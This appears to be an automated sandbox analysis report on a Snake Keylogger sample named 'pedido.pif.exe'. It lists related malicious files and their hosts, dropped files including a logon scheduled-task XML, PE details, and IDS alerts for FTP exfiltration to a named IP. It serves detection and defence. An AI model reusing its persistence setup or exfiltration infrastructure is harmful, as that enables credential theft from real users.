	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
ORACLE-BMC-31898US	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
SERVERCENTRALUS	https://link.edgepilot.com/s/e9b35021/KNsrNVGwOUukNjaKm_560w?u=https://publicidadnicaragua.com/	Get hash	malicious	Unknown	Browse	216.246.47.153
	kkkarm7.elf	Get hash	malicious	Unknown	Browse	204.93.205.45
	WIpGif4IRrFfamQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	75.102.58.14
	https://aws.predictiveresponse.net/fwdhs.htm?redirect=https://shermsco.com/umtdby0g5ztccrxs-790065	Get hash	malicious	Unknown	Browse	216.246.112.38
	http://www.tiktokchat.shop/	Get hash	malicious	Unknown	Browse	75.102.49.249
	http://fullgasesspa.cl	Get hash	malicious	Unknown	Browse	216.246.46.105
	hNX3ktCRra.elf	Get hash	malicious	Unknown	Browse	66.225.201.22
	https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	216.246.46.21
	https://login0fficemailverify.laiora.cfd/ilog.htm	Get hash	malicious	Unknown	Browse	205.234.232.49
	https://sharingfile.mirbrth.click/fileshare/index.html	Get hash	malicious	HTMLPhisher	Browse	205.234.232.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PRESUPUESTO DE NOVIEMBRE...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3

Process:	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pedido.pif.exe.log

Download File

Process:	C:\Users\user\Desktop\pedido.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//MM0Uyus:lGLHxvCZfIfSKRHmOugA1s
MD5:	40140EDFA6BDDE36CF080DC27F5101EA
SHA1:	566928297A854EA8FE6EA38AAE3A0108B26CE1D1
SHA-256:	EC5E076FFF37BD0064DB0929FAC5D09D13713132E9907AB3BA53785E27535EDB
SHA-512:	1772B8044A3AE542DFBEEBB895C7911C65653A830612C9FA31FDF46791FCBE6811B6C6136140B97764FC84801922852D3BB08E59B2BEE344433A5840A112365A
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvmt2kas.5om.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hz05ajlc.1vs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixbhlrkp.knb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usx2df0q.5l5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp30EC.tmp

Download File

Process:	C:\Users\user\Desktop\pedido.pif.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.110762460194402
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtUxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTkv
MD5:	506237A3DE1C441AD9D39E1FC54DB64A
SHA1:	AE6CDE1744213B98A3E75AB723C3083A78B2CFBF
SHA-256:	FC0C814668EBD1226EC4181F64ADE4A88C4548F051D48A056314E17B25BAEE13
SHA-512:	FA8845F48FD2997444E3F84468592DC27D82C196FC84885267B941DEB33848FC2616AE6F66B36C33384D3212707E7DC936A0E38B0501AFF2C31B925552C44A36
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp4B59.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.110762460194402
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtUxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTkv
MD5:	506237A3DE1C441AD9D39E1FC54DB64A
SHA1:	AE6CDE1744213B98A3E75AB723C3083A78B2CFBF
SHA-256:	FC0C814668EBD1226EC4181F64ADE4A88C4548F051D48A056314E17B25BAEE13
SHA-512:	FA8845F48FD2997444E3F84468592DC27D82C196FC84885267B941DEB33848FC2616AE6F66B36C33384D3212707E7DC936A0E38B0501AFF2C31B925552C44A36
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Download File

Process:	C:\Users\user\Desktop\pedido.pif.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	617984
Entropy (8bit):	7.895712490477535
Encrypted:	false
SSDEEP:	12288:woaDPw1Qk89Tmyy8e9vLr78Ly3KzgGUsB/gRZYHdh:gLw9gTFyXjvgy3Kz/UKWqd
MD5:	ADF22EB2587AB26A966C2C9673580A73
SHA1:	A846D4A58AE7B294C1958CC538B5ED103E7445FB
SHA-256:	A1777BE6284799CC06A9D9072F4F3D2181287FB7770CBD7DBFB5BBD7D031DC30
SHA-512:	BDE338B7D5D338DBA1E8AEB0BCD5E5E390025AEC48E4FFFE518B194A22FE6AEE4CD1DB0480E682E85D9D4AC20CC2AB1C4DA9FB8FC03B57344145D94390A6FF34
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|...............0..P...........n... ........@.. ....................................@..................................n..O....................................H..p............................................ ............... ..H............text....O... ...P.................. ..`.rsrc................R..............@..@.reloc...............l..............@..B.................n......H........v..........4...0...X5..........................................^..}.....(!......(......0............{....o"...o#......+...0..1.........{....o"...o$........,...(%.....+..r...p(&...&.....0..+.........,..{.......+....,...{....o'.......((......0..H.........s)...}.....s*...}.....s+...}.....(,.....{.....o-.....{.....b.$s....o/.....{.....o0.....{....r3..po1.....{.....&..s2...o3.....{.....o4.....{....rK..po5.....{.....o6.....{....rS..p"..@A...s7...o8.....{........s....o/

C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\pedido.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.895712490477535
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	pedido.pif.exe
File size:	617'984 bytes
MD5:	adf22eb2587ab26a966c2c9673580a73
SHA1:	a846d4a58ae7b294c1958cc538b5ed103e7445fb
SHA256:	a1777be6284799cc06a9d9072f4f3d2181287fb7770cbd7dbfb5bbd7d031dc30
SHA512:	bde338b7d5d338dba1e8aeb0bcd5e5e390025aec48e4fffe518b194a22fe6aee4cd1db0480e682e85d9d4ac20cc2ab1c4da9fb8fc03b57344145d94390a6ff34
SSDEEP:	12288:woaDPw1Qk89Tmyy8e9vLr78Ly3KzgGUsB/gRZYHdh:gLw9gTFyXjvgy3Kz/UKWqd
TLSH:	E5D4011137F98709E2FA7BB568B115A10BB6BD137E36D30C1D8030DE1EB2B804A65B67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|................0..P...........n... ........@.. ....................................@................................

File Icon


Icon Hash:	26b6dac84c6c3e03

Static PE Info

General

Entrypoint:	0x496efe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x97D67C86 [Wed Sep 21 23:36:38 2050 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x96eac	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x18bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x94888	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x94f04	0x95000	546d2d3d806f3ea1dfee4afcbcaeaecf	False	0.9331513475251678	data	7.914119368917141	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x18bc	0x1a00	7737461f37a007177baa62e0a858da12	False	0.4616887019230769	data	4.847577733858709	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	f2b298dae4cc9e96d924e395bf789ca2	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x98130	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4939236111111111
RT_GROUP_ICON	0x99330	0x14	data	1.0
RT_VERSION	0x99344	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data	0.42290748898678415
RT_MANIFEST	0x996d0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T10:37:17.477429+0100	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.8	55434	50.31.176.103	21	TCP
2024-10-31T10:37:17.477429+0100	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.8	55438	50.31.176.103	21	TCP
2024-10-31T10:37:30.064323+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	193.122.130.0	80	TCP
2024-10-31T10:37:31.267463+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	193.122.130.0	80	TCP
2024-10-31T10:37:31.970587+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49712	188.114.96.3	443	TCP
2024-10-31T10:37:32.704929+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	193.122.130.0	80	TCP
2024-10-31T10:37:36.342963+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49718	188.114.96.3	443	TCP
2024-10-31T10:37:36.751825+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49719	193.122.130.0	80	TCP
2024-10-31T10:37:37.986202+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49719	193.122.130.0	80	TCP
2024-10-31T10:37:38.676887+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49724	188.114.96.3	443	TCP
2024-10-31T10:37:39.213388+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49725	188.114.96.3	443	TCP
2024-10-31T10:37:39.392475+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49726	193.122.130.0	80	TCP
2024-10-31T10:37:40.102849+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49728	188.114.96.3	443	TCP
2024-10-31T10:37:40.647699+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49731	188.114.96.3	443	TCP
2024-10-31T10:37:46.637388+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	55433	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:37:28.805016041 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:28.809902906 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:28.809973001 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:28.810409069 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:28.815193892 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:29.825524092 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:29.830672979 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:29.836309910 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:30.018132925 CET	80	49709	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:30.064322948 CET	49709	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:30.095680952 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.095721960 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.095829964 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.104046106 CET	49711	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:30.104063034 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.717097998 CET	443	49711	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:30.717155933 CET	49711	443	192.168.2.8	188.114.96.3
